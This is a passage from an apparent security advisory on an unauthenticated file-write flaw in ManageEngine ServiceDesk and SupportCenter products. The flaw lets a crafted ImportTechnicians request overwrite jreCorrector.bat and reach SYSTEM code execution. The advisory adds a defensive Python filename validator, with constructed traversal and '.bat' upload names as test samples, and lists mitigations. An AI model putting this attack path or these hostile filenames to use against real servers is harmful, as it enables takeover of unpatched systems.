  A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the ImportTechnicians action to write or overwrite arbitrary files in the “\SupportCenterPlus\bin” or “\ServiceDesk\bin” directory (depending on the specific ManageEngine product). For instance, an attacker can overwrite the file jreCorrector.bat in this directory. This batch file is executed by the wrapper.exe executable during startup of the product, and again during its shutdown. ManageEngine ServiceDesk/SupportCenter products are also, by default, started automatically as a Windows service at Windows startup (including after a restart). Therefore, successful exploitation could result in arbitrary code execution with SYSTEM-level privileges.
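The two facts above, that Struts strips everything up to the last path separator but nothing checks the extension, are the whole vulnerability, and the check that closes the gap is short. The following is an added example (not ManageEngine's code and not a description of the vendor's fix): it mimics the Struts basename stripping the text describes, then applies the extension allow-list the vulnerable execute method lacks, and runs both over constructed multipart requests. The boundary string, the part name `file`, the `technicians.csv`/`report.CSV.exe` sample names and the part contents are constructed; `jreCorrector.bat` is the file named on the page.

```python
"""Validate a multipart upload filename before it reaches disk.

Added example, not ManageEngine's code. struts_basename() mimics the
traversal defence described above (Struts' CommonsMultipartRequestHandler
keeps only the text after the last '/' or '\\'); check_upload_name() adds
the extension allow-list that the vulnerable action is missing. The
multipart bodies built by build_request() are constructed samples.
"""
import re

BOUNDARY = "----sample"          # constructed boundary for the sample bodies
ALLOWED_EXTENSIONS = (".csv",)   # the import feature only ever expects CSV
FILENAME_RE = re.compile(r'filename="([^"]*)"')


def struts_basename(filename):
    """Drop everything up to the last '/' or '\\' (what Struts does; no extension check)."""
    cut = max(filename.rfind("/"), filename.rfind("\\"))
    return filename[cut + 1:]


def check_upload_name(raw_filename):
    """Return (accepted, safe_name, reason). Accepts only plain *.csv names."""
    name = struts_basename(raw_filename)
    if not name or name.startswith("."):
        return False, None, "empty or dot-prefixed name"
    if not re.fullmatch(r"[A-Za-z0-9_.-]+", name):
        return False, None, "characters outside allow-list"
    if not name.lower().endswith(ALLOWED_EXTENSIONS):
        # This is the check the vulnerable code lacks: a .bat lands in \bin otherwise.
        return False, None, "extension not allowed"
    return True, name, "ok"


def part_filenames(body, boundary):
    """Return every filename= value found in the part headers of a multipart body."""
    names = []
    for part in body.split("--" + boundary):
        header_block = part.split("\r\n\r\n", 1)[0]   # headers end at the blank line
        for line in header_block.split("\r\n"):
            if line.lower().startswith("content-disposition:"):
                match = FILENAME_RE.search(line)
                if match:
                    names.append(match.group(1))
    return names


def build_request(filename, content):
    """Constructed sample multipart/form-data body for a single uploaded part."""
    return (
        f"--{BOUNDARY}\r\n"
        f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
        f"{content}\r\n"
        f"--{BOUNDARY}--\r\n"
    )


def verdicts(bodies):
    """Run the check over several bodies; returns [(raw filename, accepted, reason)]."""
    out = []
    for body in bodies:
        for raw in part_filenames(body, BOUNDARY):
            accepted, _safe, reason = check_upload_name(raw)
            out.append((raw, accepted, reason))
    return out


# Constructed samples: a normal import, a traversal attempt that Struts already
# neutralises, and two non-CSV names that only the added extension check stops.
SAMPLES = [
    build_request("technicians.csv", "name,email\r\nalice,alice@example.com"),
    build_request("..\\..\\conf\\technicians.csv", "name,email"),
    build_request("jreCorrector.bat", "not-a-csv"),
    build_request("report.CSV.exe", "not-a-csv"),
]

if __name__ == "__main__":
    for raw, accepted, reason in verdicts(SAMPLES):
        print(f"{raw!r:40} accepted={accepted} ({reason})")
```

Two points to take from the output: the traversal sample is accepted because Struts reduces it to `technicians.csv`, exactly as the text says, while the `.bat` and `.CSV.exe` names are rejected only by the added extension check. Even with a correct name, writing uploads into the same `\bin` directory as batch files run by wrapper.exe is the second half of the problem; hardened code should write them to a dedicated non-executable directory.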

Triggering the Problem:

  • The target must be running a vulnerable version of the software.
  • The attacker must have network connectivity to the target server.

Triggering Conditions:

  The attacker sends a request to the vulnerable servlet on the target server. The vulnerability is triggered when the server processes the request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP, over port 8080/TCP

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 2302 ManageEngine Products ImportTechnicians Arbitrary File Creation

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Restricting access to the affected communication port to trusted hosts only.
    • Upgrading to a non-vulnerable version of the product when available.
    • Detecting and blocking malicious traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory 1
  Vendor Advisory – ServiceDesk Plus MSP
  Vendor Advisory 2
  Vendor Advisory – ServiceDesk Plus
  Vendor Advisory 3